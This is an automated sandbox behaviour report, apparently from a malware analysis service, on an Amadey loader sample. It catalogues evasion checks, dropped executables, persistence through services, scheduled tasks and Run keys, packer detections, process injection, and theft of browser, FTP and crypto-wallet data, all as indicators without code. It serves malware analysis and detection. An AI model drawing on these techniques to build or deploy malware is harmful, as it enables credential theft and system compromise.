amadey | ad87972f0949b9ce741f1e2d4cf1daa64fc3bf32dc1dbc926c1579138fb0bace

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	LAjLRnhV4UjOx8B3HbyvLFc4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BAEBFIIECB.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
220	1416	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1768	powershell.exe
3876	powershell.exe
4392	powershell.exe
4792	powershell.exe
180	powershell.exe
1424	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x000700000002359c-139.dat	net_reactor
behavioral1/memory/1876-476-0x0000000000390000-0x00000000007CC000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BAEBFIIECB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LAjLRnhV4UjOx8B3HbyvLFc4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LAjLRnhV4UjOx8B3HbyvLFc4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BAEBFIIECB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	G8FbtlgLE3rUkMPXnsq75quh.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	BAEBFIIECB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	explortu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	kKGgJLM.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	LAjLRnhV4UjOx8B3HbyvLFc4.exe

Executes dropped EXE 24 IoCs

pid	Process
4732	setup.exe
2096	setup.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
4456	xBXjl0R8rYG45a3wzU77TxNo.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe
2548	f8rA590jTVvwofQOQzIn6gvr.exe
4724	NSBT2UTHbN3rUH67MwoPLEur.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
3596	3IfifMzwN9KSsku1z7iQUZZd.exe
2616	3IfifMzwN9KSsku1z7iQUZZd.tmp
4020	Install.exe
2404	directwavmp3splitter.exe
1840	Install.exe
1428	directwavmp3splitter.exe
1876	mAph8Of7DxihsslLJNYfDDIp.exe
1700	BAEBFIIECB.exe
3820	explortu.exe
2384	7785ba0063.exe
4088	eqtpkqwqodik.exe
4972	Install.exe
2236	explortu.exe
3720	kKGgJLM.exe
1372	explortu.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	BAEBFIIECB.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explortu.exe

Loads dropped DLL 4 IoCs

pid	Process
2616	3IfifMzwN9KSsku1z7iQUZZd.tmp
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1416	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/4428-190-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-197-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-198-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-199-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-210-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-196-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/files/0x000700000002359a-170.dat	themida
behavioral1/memory/4428-753-0x0000000000550000-0x000000000110A000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	LAjLRnhV4UjOx8B3HbyvLFc4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LAjLRnhV4UjOx8B3HbyvLFc4.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	kKGgJLM.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	kKGgJLM.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
140	iplogger.org
141	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
69	api.myip.com
70	ipinfo.io
71	ipinfo.io
68	api.myip.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3652	powercfg.exe
4764	powercfg.exe
4480	powercfg.exe
448	powercfg.exe
344	powercfg.exe
2136	powercfg.exe
876	powercfg.exe
4812	powercfg.exe

Drops file in System32 directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	kKGgJLM.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	kKGgJLM.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	kKGgJLM.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	kKGgJLM.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	kKGgJLM.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	kKGgJLM.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	kKGgJLM.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1700	BAEBFIIECB.exe
3820	explortu.exe
2384	7785ba0063.exe
2236	explortu.exe
1372	explortu.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 5092 set thread context of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 4456 set thread context of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 1876 set thread context of 2356	1876	mAph8Of7DxihsslLJNYfDDIp.exe	159
PID 2548 set thread context of 3580	2548	f8rA590jTVvwofQOQzIn6gvr.exe	193
PID 4088 set thread context of 3944	4088	eqtpkqwqodik.exe	198
PID 4088 set thread context of 2752	4088	eqtpkqwqodik.exe	203

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\dLLzADClkagU2\EhbGVIS.xml	kKGgJLM.exe
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\ErwKKvV.xml	kKGgJLM.exe
File created	C:\Program Files (x86)\RgdiTWAdU\ibnZZl.dll	kKGgJLM.exe
File created	C:\Program Files (x86)\dLLzADClkagU2\ViRbBneZkZMll.dll	kKGgJLM.exe
File created	C:\Program Files (x86)\RgdiTWAdU\rbamWFx.xml	kKGgJLM.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\tpuapcA.xml	kKGgJLM.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	kKGgJLM.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	kKGgJLM.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\omgwHNg.dll	kKGgJLM.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	kKGgJLM.exe
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\EcbylAk.dll	kKGgJLM.exe
File created	C:\Program Files (x86)\LUWSYkNLogUn\MmbYzAa.dll	kKGgJLM.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	kKGgJLM.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	kKGgJLM.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bjeWJKrHnPpdAGCduF.job	schtasks.exe
File created	C:\Windows\Tasks\explortu.job	BAEBFIIECB.exe
File created	C:\Windows\Tasks\zjtCPqTOixnxYITTP.job	schtasks.exe
File created	C:\Windows\Tasks\gwLAkOfFqvEnRPY.job	schtasks.exe
File created	C:\Windows\Tasks\mFeioppqsVnzBGRpZ.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2392	sc.exe
388	sc.exe
2544	sc.exe
4696	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1016	4972	WerFault.exe	205
1896	1840	WerFault.exe	133
4380	3720	WerFault.exe	295

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	G8FbtlgLE3rUkMPXnsq75quh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	G8FbtlgLE3rUkMPXnsq75quh.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8ed48-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8ed48-0000-0000-0000-d01200000000}\MaxCapacity = "14116"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8ed48-0000-0000-0000-d01200000000}	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kKGgJLM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kKGgJLM.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1368	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4268	schtasks.exe
3244	schtasks.exe
1880	schtasks.exe
1212	schtasks.exe
3612	schtasks.exe
2432	schtasks.exe
4640	schtasks.exe
4288	schtasks.exe
2624	schtasks.exe
3200	schtasks.exe
3612	schtasks.exe
1872	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2832	7zFM.exe
2832	7zFM.exe
4732	setup.exe
4732	setup.exe
2096	setup.exe
2096	setup.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
4392	powershell.exe
4392	powershell.exe
4392	powershell.exe
1876	mAph8Of7DxihsslLJNYfDDIp.exe
1876	mAph8Of7DxihsslLJNYfDDIp.exe
4792	powershell.exe
4792	powershell.exe
4792	powershell.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
3220	MSBuild.exe
3220	MSBuild.exe
2356	MSBuild.exe
2356	MSBuild.exe
1700	BAEBFIIECB.exe
1700	BAEBFIIECB.exe
2356	MSBuild.exe
2356	MSBuild.exe
3848	MSBuild.exe
3848	MSBuild.exe
3820	explortu.exe
3820	explortu.exe
3848	MSBuild.exe
3848	MSBuild.exe
